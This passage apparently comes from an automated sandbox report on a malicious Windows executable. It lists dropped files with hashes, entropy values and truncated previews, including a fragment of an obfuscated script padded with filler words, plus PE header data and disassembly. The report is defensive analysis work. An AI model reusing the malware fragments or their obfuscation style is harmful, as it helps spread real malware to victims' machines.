                                                                                                                                                                        Preview:.~..v..F..H..u....N.P...j...P......u......k1...>3._.F.....^]...U..E.VW.@..H..0.2...P...*...P.\....u......+1...>3._.F.....^]...U..V.u....W.~..v..F..H.......V.P.J..2.....P.......P.....u.......0...>3._.F.....^]...U....SVW.}.3.]..]..]..w....r!.G.j).H..M.......u......M.A......r..G.j).H.......u..W....E....r..O.j).I..k.....u..9....O.....E..I..(.....$..E..G..p....G....u..F..u..u....G.SQ.......P.x....u......./...>3._.F.....^[....U..M.3.9A.v..A....q..VWP......u....../...>3._.F.....^]...U.....e..SVW.}.........j...j.S.X....E.....x..v..@....Mq.....E..M.Q.M.Q.M.Q.M.Q.M.QP.............E.3..e..Fj..E.E.VPS.u..........M..#/...E.3.V.E.E.VPS.}.u..........M.......E.j..E.E.VPS.}.u.........M.......E.j..E.E.VPS.}.u.........M......E.j..E.E.VPS.}.u..].......M......8.......'.3.B.W....H..|1...D1.t..@8.P..|1...D1.t..@8.@.._^3.[....U........=.(M..SVW.L$.uA...@..|....T..t..R83.C.Z..|....T..t..R8.u....B.......3..^..>.Q.....(M..0....M.3..C.|$..y..v..I.......;.u.....2.....!............M..
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                        Entropy (8bit):7.9975626227798315
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:cQ36ddIs69BLJSqA8PWfAx/lruBD5hf6akJGg1lg+xM4Zl:cQlF9oAjrO4G+a+xMyl
                                                                                                                                                                        MD5:832042466014761981CDAF193F0E7041
                                                                                                                                                                        SHA1:301225CDE7E7DE3A10E98D7C9DE191D85AAC0099
                                                                                                                                                                        SHA-256:FF5E35AC52EA87EC94D3847112D9F3083B3BF252FA74C76D453EE118BA1A2BE8
                                                                                                                                                                        SHA-512:2A49ECD5DE8702A71267463B8CD130F1AA91D1E3F8D9EB866B8C58C8FC46374F98AECDCDCD071D207F734A61D082AAA56170152EEDA3C0E445C0A5CCD6A50260
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..2O;.....=F.u...~X.^tu4ey?...v............E=.....U..x...'...=.g.....=..".......C-..}...8...8.Br..g]....M.-.>.r,...I.......!.5..f.4...FV.U.,.%zY...~.ysqV..V...I...?...)..zRsa...#.G..C.pqe.b{.:%k.y...)..Y..-<.n.J/<gkN..m.\.L.I.VIC q.rc..YMn%<....O.......4.....J..C,s..U.{N.z.pAU..dX...M.7.$1...a..&..|89...}).g...F.e.p.....&..P..t.0......64.$)...K..f2.!.P.P...A...~..G..!.M.f.f..._...i..U.<..@9 .....2.FN.`....fT..#[...\9.0.kO.S.^A.....K:.....a.AES2...ps$.8F5... UF......(.X=Ha............s.rb.._f.A...q..*..#.....M..T...qj:...$0Y...P...r..o..].m.f.>.1_|.p76.........a..6.>G.a.....c...]u+.$....v. 3[-e...D.kw. ..Y.O.a.BsW....E...bw`..Y.7>...<......e.....a..*E...Vy..#u3..A.YW......~......w.-P..)S..4.J...k..JZ.\.HR..V...y....q..jB..@.G@-..Q5."[.&A.J!....F.'J4..>.......< ........@..c5/K.y.....S......?.3.Q...2M........?~....GQ0.k8.{5[.P\WY..7....k.wc.JA.k..77"^a.n...I.#....J.M..p!....t=z..?W .Iqi...b..!PDv...)3.....;,#.uH2...X....+..<.G;hM......$.Npr.e....|.
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):100352
                                                                                                                                                                        Entropy (8bit):7.9982884825197775
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:qIl7/T+lGxZhNlCtHtyAtgvWscqQlxaDOgASCZ5FSJqz7D6qAK8KxGBpM:xZL33R0HtyA+RQlKOmxw/D8KxGBpM
                                                                                                                                                                        MD5:CD00C53F92FBED3C8947B7205A4247ED
                                                                                                                                                                        SHA1:87D5486B7EFD98DCC92B4393D20D39D12CB6487E
                                                                                                                                                                        SHA-256:EDD50131DA69EA2747D0BCA3ECD4293778BEB5491FBF02BF6D4ADA4B2E9F01C1
                                                                                                                                                                        SHA-512:D1C7AAD1E7F376C7622031D36A3C1F2452B693E5FA976B35CFC22045180388B55218FA8C2B0270C2F66C996B805112C6D82F312642809D9051F350AE1220A85E
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..t!@xF.....U...-p.....)..1^....Y.....w...z..(.....b.$\X..2..#.....6c..@...\.E$R.u....Z.]..<`..v...9.a.W..N?=...6..d._......9.~.5~.....Jd...~0h'.............bf.6....Q.I........J.U.d......I...\.'J..m..).n.,S.../.............*...$.j.....,L.-....`s2..2...V........U.6.\./U~...y...K..2.i.*z...l.k.EQ..*+.=.....E]T.\Y.?.C..'*.m...hP.'.M..mc....:}.e6-^.g..$...o.k.b]!@...Vl.,.e.O.....9S.?..MA......|...U?].....D..f...*.D=....za.Nf......46.I......>..../T(6...L..B..Y.8.3B..J.[S..@........%..^..e$.ck......b.h.....Y.$:.K_p}c.;i..C.}..O.D |.&...*f|n.......yq....#|..B..T..F....t..R~)d)<.N.0......tp.9..~Co.....W.n.(1.).y...%_.......Y....D(..b....>..)^....dGX..iA.9...n.H8...pn...D...\.......a5.t\<1.N..=.......v..e.q.M.W..]....a.-7~*BO.k..j...|3.}_2jz.A3.X.-3(.fN\.4.>J......yG...om......f....v..uCP...+g...i.IU{R..Be8.....o5...=...k.n`(..m..w..S.9.@..l.ri...U?..ctD+...+S...u.e;..G.G.=3S,.S.......q....M.U/z.>..y..k....e..J&4$.z.....[B..J.Ax0..!]fr....M..Ry
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):88064
                                                                                                                                                                        Entropy (8bit):5.844749716437728
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:xj62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwug:xjfTq8QLeAg0Fuz08XvBNbjaAtg
                                                                                                                                                                        MD5:7A1D29A789B8F5CA0F4186AA1DBC3BC2
                                                                                                                                                                        SHA1:A9A3169FF90FA2BFFB8D96F95FFDB3A70386B476
                                                                                                                                                                        SHA-256:A513073A8C2E7F41CF78374498C2D980CD8DA473246AF5475C53C1D7FA7BA0DE
                                                                                                                                                                        SHA-512:AD90D9521F68AFFDA3AD4CCA4ECF1A72C3CFCB465F3D60FB8BCB02FFACD3ABD9F1DBF03C022F13FC68DA74080355CE36C0B13D4E511E0857AF60C30B2032D3A0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..F.. r.^].U..QS.].V.u..U..C.W....Cx.<H....b....}....0....{P.........w.E.;........C|......E.;...(.....2.....%....=....u....#....#....................%....=....u....#....#.....................L..............M.,K.;.t-.....K...;.t ......K....@.K...;..........;.u......E.;}...F...+U......u..~.+.N;S|sa........E.=....w..C<.]......]..].......w..C<....9M.u1.........~..[|N;.s.............f;.u......j.X....._^[..U..QQSV.u...M.W..xQ;u.}L.D..+..E....E....P.......Y..u.j..+...E..u...HQW.R...E....3.f..8.M..E..9..j.X_^[..U....SVW....3.B.....#.M.......sQ.......u%f..u....L.............j..T>.X....3...f..t...........T8.t..E.........j.Y..".t... ...f...........E......}..E......U.3.E.B.......f;.u<....}..t&%....=....u.........#.#..............;...........j.Xf;..........}..tZ..%....j.[=....u.........#.#....................%....=....u"............%....................;.r.;...r...3.B...j.Yf....'....E._^[..E......L.....E....E.,K..E.3.f;].....E..E.....2....$...I.j.Xf;..........K.<.......<....
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 488808 bytes, 9 files, at 0x2c +A "Cooked" +A "Receiver", ID 6076, number 1, 29 datablocks, 0x1 compression
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):488808
                                                                                                                                                                        Entropy (8bit):7.998475465922649
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:ohQLaKCeh787wflZffn5DMrTn1GF1MwTYcOkxFdryB:PaenflZ1iT1CMaLLxFde
                                                                                                                                                                        MD5:97942C5C8DFF98863EFC71FC15CE0257
                                                                                                                                                                        SHA1:14D6BA8E5C3B7BE1BE540CA7ECAA075D5C505E3B
                                                                                                                                                                        SHA-256:B4A2CBEAA8185681ED75BDF2C34020CCAA9405A42A47C4C3D17EC6E907FD9152
                                                                                                                                                                        SHA-512:7D1FABB306D3CD38985CE6472DF17973AEE7F4D56902D48A1CF690BBAF8D5BA71D83DD79136FCA635AB51813FC3978E9871DECAD0E07D46BEE5A998E5CB77D6F
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MSCF....hu......,......................................Y<. .Cooked..X.........Y<. .Receiver..(...@.....Y<. .Attractions.Q....h.....Y<. .Fingers..D..Q;.....Y<. .User.....Q......Y<. .Pot.....Q......Y<. .Alt.....Q......Y<. .Articles..T..] .....Y<. .Specialty./.s6.R..CK...xT..0|f.$9$.3.."..:Z...pI.. L.Bp..........s.h.BO.9lF..V..Z..V........./.D..$"mw<Q.b2.....$...?...}Y{..../..;0R.......G...H....E.........r..wX..A)$KZ.........f..<../....Z.............ul....Z+..i)={.'.....PW..6OO5<..s.(....k.c...N.s.Z.g.."E..KH....k....%:6A;Cj...^.O..P.m.8._.3b.......?...Z..T..V.O...I....kEA.E&.|..}...."...7...0."....Ep(...`8....Y;t+..y...&K ]RS.h.4...0AP.<Z..J..V.Pwmx.FE...,.uJm./.......k ...V....B....!u..ix.a.H.;.......gGM......bs..D..7....Q.....Id.S..4.{....*.(7..:.ym....wB)z..^C....15%|.Ru.....\.[8.....'@9j~..E...p&.]..)0...Lzz%..m....w..Z8.Og...d.....%.B.D...t..~$6.... .C..Qs..z..............h..=..)....4H+`.v"5W.....h.....X..>O...}5m.lj......&..U?.1.....WN...,tC.IN.6+....
                                                                                                                                                                        Process:C:\Users\user\Desktop\TNyOrM6mIM.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):6851208
                                                                                                                                                                        Entropy (8bit):6.451509958428788
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:98304:ty1CDpiB/weoINcERH7q/70/ske9dKVyz8SC:jViB/NooB7edGG8SC
                                                                                                                                                                        MD5:2A99036C44C996CEDEB2042D389FE23C
                                                                                                                                                                        SHA1:4F1E624BCC030E44722DE26B72C8156BF57E14E8
                                                                                                                                                                        SHA-256:73AA5EE19F0EA048DCFF2F44D6FD5AC41C13E2D7E61371459E756836F72CAD43
                                                                                                                                                                        SHA-512:6907CD0E47293C8C96345ED00F2F3FA2241CE1671EE73A599837857BFB39F6C7E373AAD843CC78FB550D2DB10BDFE066A021CEC4C8A49AECDF06A7E71EDADEDD
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5mg...............(.hK...h..2............K...@...........................i......h...@... ..............................`e..-....................h.......e.`L...........................0d......................he. ............................text....gK......hK.................`..`.data...D(....K..*...lK.............@....rdata........O.. ....O.............@..@.eh_framdM....d..N....d.............@..@.bss.....1... e..........................idata...-...`e.......e.............@....CRT....0.....e......2e.............@....tls..........e......4e.............@....reloc..`L....e..N...6e.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152576
                                                                                                                                                                        Entropy (8bit):6.433958275406592
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:UZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDQWf05mjD:UK5vPeDkjGgQaE/loUDtf0aD
                                                                                                                                                                        MD5:D49F624EA007E69AFE1163955DDBA1BB
                                                                                                                                                                        SHA1:EE35A9CEAB1F6A40694B26094FDC7727658293D2
                                                                                                                                                                        SHA-256:4052653CEDFD2F560DA3BEE9825F88F60DBD053ABB3C064F3D19D98863B2962C
                                                                                                                                                                        SHA-512:63B1629E79C35E59923D4A1C12B93FEB45241EB0D2B59A03B9EB14BF76DAA82BA124710E8F4AA157D0C63BADFDCFFD916F049B85DE4B52CAA143F0DD32AD71E8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25405
                                                                                                                                                                        Entropy (8bit):5.118149909201556
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                        MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                        SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                        SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                        SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25405
                                                                                                                                                                        Entropy (8bit):5.118149909201556
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                        MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                        SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                        SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                        SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):148480
                                                                                                                                                                        Entropy (8bit):6.695251861322664
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3072:4cBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi80PtCh:4cB3gBmmLsiS+SAhClbfSCh
                                                                                                                                                                        MD5:A1E25E38AD59F032B7717CC6E5E00609
                                                                                                                                                                        SHA1:F7E7D770656E25F73BE807AC53F49776810099D5
                                                                                                                                                                        SHA-256:A39C8CC684FC60938C2F6CF62640F4B67F8C29A1EE75D172735B8384F8D79E8A
                                                                                                                                                                        SHA-512:4DDCF310A6FB0E21717A14EBD47C78043B792837F21BD13392B06D08C9D4CB974407218ECFAC94D03E23DEFFE2B6B613FB408EFB1A621913AF4D97A2424D4AEA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:f;...J....f...f;........B.f;...0....Pvf;........B.f;........Pvf;........B.f;........P...f;........B.f;........Pvf;.rw.B.f;.........Pf;.rc..Pf;........@...f;.rM.B.f;............f;.r7.B.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.v.j..F.Zf;.v......t"..uWj.[.]..Oj.Z.F.f;....w... ..........M...xt...Xt...u.j.[.].P.M..A.......u.j.[.]...1..M.....E.QPj.j..M..:....M..].3.E..M.j0Xf;.......j:Zf;.s....+..........f;...k....`...f;...s....P.f;.r.....f;...]....P.f;.r..f...f;...G....P.f;.r..Bvf;...3....P.f;.r..Bvf;........P.f;...z....Bvf;........P.f;...b....Bvf;........P.f;...J....f...f;........P.f;...0....Bvf;........P.f;........Bvf;........P.f;........P...f;........P.f;........Bvf;.rw.P.f;.........Pf;.rc..Pf;........@...f;.rM.P.f;............f;.r7.P.f;.........0f;.r#..0f;.s..}........f;...o.........u.jAXf;.w.jZXf;.vUj..F.Zf;.vM............;}.s~.U..E...;..U..M.r<.u.w.;.r3;.u.;E.u.;].r%w.;}.v.....U..1j.Z.F....f;.w... ....PQ.u..u...........M...E.E..M...0....E.....V.
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\PasoCattle.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):79872
                                                                                                                                                                        Entropy (8bit):7.997576222410487
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:eLQfqgBMCPA1XlKvwsSow5tLh2bBK3M1wY6FCUN8Pn+9BlGRpjyBGHS:1ICPA11KIjP5tLsbBKM176F7NVARcBGy
                                                                                                                                                                        MD5:6ECD89B15DFAEE100B13F894C76F9CEE
                                                                                                                                                                        SHA1:CFF0D1262CAD22201D25B331AFD9EB882865767F
                                                                                                                                                                        SHA-256:73D440F3C827B1B041209B7C9F2FD26D3BD6A5CDA3713B86BA965BF45AA46325
                                                                                                                                                                        SHA-512:6452A2A3DE1EC01DDA09ADF53C92A63C6AC830B3DC61CF305C08BAF5BD8FEB14EE67BD1B2BF7B8B61A46E8D3E9B23FB4097CB4565092840F6811084C98CEBC74
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:/..GG..z..>.p(.....!}..h..}..O.;....."}$48...Bk.a-,n."..n.1&.. ..........c....<i`p...'.....E3.&..Q.y......oX.W:.u.....`.....?.l..uFWV..(H.u.......H.....(%8...x,...h.i..w.y...#...\.`V'v.2..F1S+4.c.3..j.Z.r.d.b.6.h....=....yH.:.....a..m...)a...w;.=4...\i....p.'.p.$.?x....T...!G<.W4......Q.qG..B05.t..tP.E....r.S.Gx.........1~...%.6..I........4..T7...$u:...4.WC^.2v..t....E.....%....t].D....4$.U...&.h. Im..Y"{,...|...?[9[..";6....~.$2P...Fb.....UZ^9&.....!..}."<.y...?....|..Y........$......>.V.Be....l^.&.h%Z.f..6........3.n.Sg......MU.^&..A..=.b.......e"..5p...i..r.$.R.%.f..8.2`.C."r._..9.6-.b.y.y5n...L.W...?$......r..>.....A...q.....Q...E.c..[.Qho..C..G.....:.K.NT.mQ..$.s..y...F...=..\....Y=.r.U....P..0..._u.....ib...r.....V.(.)..R....1..k.h..[0....1r4.......T\p..<...n..;4\D+......u|7.s2>..60...n.,... ...X..1=...N.6.pC....@l.....p...<(....../..G.t4....7wp+...r.J%...0.N....g....]..|..n.......o.Lx..q.S...B.5],.M.H.P...@B...g.js.N.fY..9..{..
                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.983037274902511
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:TNyOrM6mIM.exe
                                                                                                                                                                        File size:7'080'960 bytes
                                                                                                                                                                        MD5:ec19fa1027fee164803cc127aef64199
                                                                                                                                                                        SHA1:8a1c7cd16c432a67eb9d71fe745d5ce5e4315dfd
                                                                                                                                                                        SHA256:bb6ed22605e38edeea643fc3ef43ced73ba96cc3740f8e1d4332932a36d45a41
                                                                                                                                                                        SHA512:3f11ccce6a0b870e8596e24d2b91d492c8a7d6b6e8d5a0d868a0db90d03a76f0d1c91907bfe98e95d2542deceb39c66a5ce69114d980d61e5bcff4ec1a5c4a78
                                                                                                                                                                        SSDEEP:98304:47RIWaDhDFxHWAW8+xfbZV1IucY8j8NHM3lngV++ZKHWywyfQmZ:4FItx3WhxFVgY88HM3NgV++Z2WuI+
                                                                                                                                                                        TLSH:4A66339E27A58FE9C1B2A0774283FE70A8B9A67552314BFCD54EC0CB03B1B5B1D68C51
                                                                                                                                                                        File Content Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E.ng..................x.............. ... y...@.. ................................l...@................................
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0xfda000
                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE
                                                                                                                                                                        Time Stamp:0x676E9445 [Fri Dec 27 11:49:25 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                        Instruction
                                                                                                                                                                        jmp 00007FD6F941857Ah
                                                                                                                                                                        pminsw mm5, qword ptr [ebx+00h]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        jmp 00007FD6F941A575h
                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        or ecx, dword ptr [edx]
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
